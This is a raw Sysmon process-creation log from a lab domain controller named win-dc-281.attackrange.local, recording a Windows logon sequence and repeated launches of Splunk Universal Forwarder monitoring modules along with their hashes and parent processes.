CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{A8622C2F-41CC-6078-C803-00000000AE01}5040C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 154100x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:20.329{A8622C2F-41CC-6078-C803-00000000AE01}5040C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exewinlogon.exe 154100x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:19.446{A8622C2F-41CB-6078-BC03-00000000AE01}2760C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{A8622C2F-3DEE-6078-0F00-00000000AE01}1116C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 154100x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:19.405{A8622C2F-41CB-6078-BB03-00000000AE01}2116C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:19.394{A8622C2F-41CB-6078-BA03-00000000AE01}4624C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{A8622C2F-3DEC-6078-0B00-00000000AE01}840C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 154100x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:18.173{A8622C2F-41CA-6078-B003-00000000AE01}4864C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:18.085{A8622C2F-41CA-6078-AF03-00000000AE01}2788C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:17.327{A8622C2F-41C9-6078-AB03-00000000AE01}4120C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{A8622C2F-41C9-6078-E6D0-210000000000}0x21d0e62SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exewinlogon.exe 154100x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:17.277{A8622C2F-41C9-6078-AA03-00000000AE01}2264C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a6a855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exewinlogon.exe 154100x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:16.620{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{A8622C2F-41C8-6078-A403-00000000AE01}736C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000b0 0000007c 154100x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:16.563{A8622C2F-41C8-6078-A503-00000000AE01}2692C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{A8622C2F-41C8-6078-A403-00000000AE01}736C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000b0 0000007c 154100x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:16.555{A8622C2F-41C8-6078-A403-00000000AE01}736C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000b0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 154100x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:26.351{A8622C2F-4196-6078-3303-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:25.085{A8622C2F-4195-6078-3203-00000000AE01}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:24.413{A8622C2F-4194-6078-3103-00000000AE01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:23.741{A8622C2F-4193-6078-3003-00000000AE01}4840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:22.585{A8622C2F-4192-6078-2E03-00000000AE01}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:21.789{A8622C2F-4191-6078-2C03-00000000AE01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:21.085{A8622C2F-4191-6078-2B03-00000000AE01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:26.461{A8622C2F-415A-6078-FA02-00000000AE01}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:25.070{A8622C2F-4159-6078-F702-00000000AE01}1376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:24.398{A8622C2F-4158-6078-F502-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:23.728{A8622C2F-4157-6078-F302-00000000AE01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:22.572{A8622C2F-4156-6078-F002-00000000AE01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:21.867{A8622C2F-4155-6078-EA02-00000000AE01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:21.086{A8622C2F-4155-6078-E502-00000000AE01}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:26.430{A8622C2F-411E-6078-7802-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:25.104{A8622C2F-411D-6078-7502-00000000AE01}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:24.602{A8622C2F-411C-6078-7402-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:23.790{A8622C2F-411B-6078-6F02-00000000AE01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:22.680{A8622C2F-411A-6078-6A02-00000000AE01}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:21.868{A8622C2F-4119-6078-6502-00000000AE01}4612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008808Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:21.055{A8622C2F-4119-6078-6402-00000000AE01}2692C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:34:26.415{A8622C2F-40E2-6078-0802-00000000AE01}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 